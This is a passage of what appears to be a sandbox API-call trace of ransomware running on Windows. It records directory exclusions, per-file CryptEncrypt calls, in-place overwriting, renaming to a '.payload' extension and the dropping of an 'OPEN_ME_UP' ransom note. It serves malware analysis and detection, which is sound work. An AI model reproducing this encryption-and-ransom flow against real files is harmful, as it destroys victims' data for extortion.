ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.192] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0060.192] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0060.192] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0060.192] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0060.192] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0060.192] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 48 [0060.192] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0060.192] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.192] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0060.192] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.192] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.192] GetTickCount () returned 0x114f7a0 [0060.192] GetTickCount () returned 0x114f7a0 [0060.192] GetTickCount () returned 0x114f7a0 [0060.192] GetTickCount () returned 0x114f7a0 [0060.192] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.193] GetProcessHeap () returned 0x5e0000 [0060.193] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0060.193] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.194] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.195] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.195] GetProcessHeap () returned 0x5e0000 [0060.195] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.195] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.195] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.195] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.195] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.195] CloseHandle (hObject=0x438) returned 1 [0060.197] GetProcessHeap () returned 0x5e0000 [0060.197] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0060.197] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0060.197] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0060.198] GetProcessHeap () returned 0x5e0000 [0060.198] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.198] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.198] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0060.198] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0060.198] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0060.198] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0060.198] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0060.198] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 49 [0060.198] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0060.198] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.198] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0060.198] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\3076\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.198] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.198] GetTickCount () returned 0x114f7af [0060.199] GetTickCount () returned 0x114f7af [0060.199] GetTickCount () returned 0x114f7af [0060.199] GetTickCount () returned 0x114f7af [0060.199] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.199] GetProcessHeap () returned 0x5e0000 [0060.199] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0060.199] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.201] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.201] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.201] GetProcessHeap () returned 0x5e0000 [0060.201] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.201] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.201] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.201] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.201] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.201] CloseHandle (hObject=0x438) returned 1 [0060.202] GetProcessHeap () returned 0x5e0000 [0060.202] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0060.202] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0060.202] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0060.203] GetProcessHeap () returned 0x5e0000 [0060.203] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.203] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0060.203] FindClose (in: hFindFile=0x6063e0 | out: hFindFile=0x6063e0) returned 1 [0060.203] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3076\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0060.203] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\3076\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0060.203] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0060.205] CloseHandle (hObject=0x430) returned 1 [0060.205] GetProcessHeap () returned 0x5e0000 [0060.205] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0060.205] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="3082", cAlternateFileName="")) returned 1 [0060.205] lstrcmpiW (lpString1="3082", lpString2="Windows") returned -1 [0060.205] lstrcmpiW (lpString1="3082", lpString2="$Recycle.bin") returned 1 [0060.205] lstrcmpiW (lpString1="3082", lpString2="System Volume Information") returned -1 [0060.205] lstrcmpiW (lpString1="3082", lpString2="Program Files") returned -1 [0060.205] lstrcmpiW (lpString1="3082", lpString2="Program Files (x86)") returned -1 [0060.205] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082") returned 30 [0060.205] lstrcmpW (lpString1="3082", lpString2=".") returned 1 [0060.205] lstrcmpW (lpString1="3082", lpString2="..") returned 1 [0060.205] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\3082", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0060.205] GetProcessHeap () returned 0x5e0000 [0060.205] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0060.205] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\*") returned 32 [0060.205] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606220 [0060.205] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.205] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.205] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.205] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.205] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.205] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\.") returned 32 [0060.206] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.206] FindNextFileW (in: hFindFile=0x606220, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0060.206] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.206] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.206] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.206] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.206] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.206] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\..") returned 33 [0060.206] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.206] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.206] FindNextFileW (in: hFindFile=0x606220, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbfd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.206] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0060.206] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0060.206] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0060.206] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0060.206] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0060.206] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 39 [0060.206] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0060.206] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.206] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0060.206] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.206] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.206] GetTickCount () returned 0x114f7af [0060.206] GetTickCount () returned 0x114f7af [0060.206] GetTickCount () returned 0x114f7af [0060.206] GetTickCount () returned 0x114f7af [0060.206] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.207] GetProcessHeap () returned 0x5e0000 [0060.207] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0060.207] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0xbfd, lpOverlapped=0x0) returned 1 [0060.208] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffff403, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.208] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0xbfd, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0xbfd, lpOverlapped=0x0) returned 1 [0060.208] GetProcessHeap () returned 0x5e0000 [0060.208] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.208] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.208] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.208] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.208] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.208] CloseHandle (hObject=0x438) returned 1 [0060.209] GetProcessHeap () returned 0x5e0000 [0060.209] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0060.209] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0060.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0060.211] GetProcessHeap () returned 0x5e0000 [0060.211] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.211] FindNextFileW (in: hFindFile=0x606220, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1387c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.211] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0060.211] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0060.211] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0060.211] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0060.211] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0060.211] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 48 [0060.211] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0060.211] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.211] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0060.211] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.211] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.212] GetTickCount () returned 0x114f7af [0060.212] GetTickCount () returned 0x114f7af [0060.212] GetTickCount () returned 0x114f7af [0060.212] GetTickCount () returned 0x114f7af [0060.212] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.212] GetProcessHeap () returned 0x5e0000 [0060.212] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0060.212] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.227] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.227] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.227] GetProcessHeap () returned 0x5e0000 [0060.227] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.227] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.227] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.227] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.227] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.227] CloseHandle (hObject=0x438) returned 1 [0060.324] GetProcessHeap () returned 0x5e0000 [0060.324] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0060.324] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0060.324] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0060.325] GetProcessHeap () returned 0x5e0000 [0060.325] HeapFree (in: hHeap=0x5e0000, 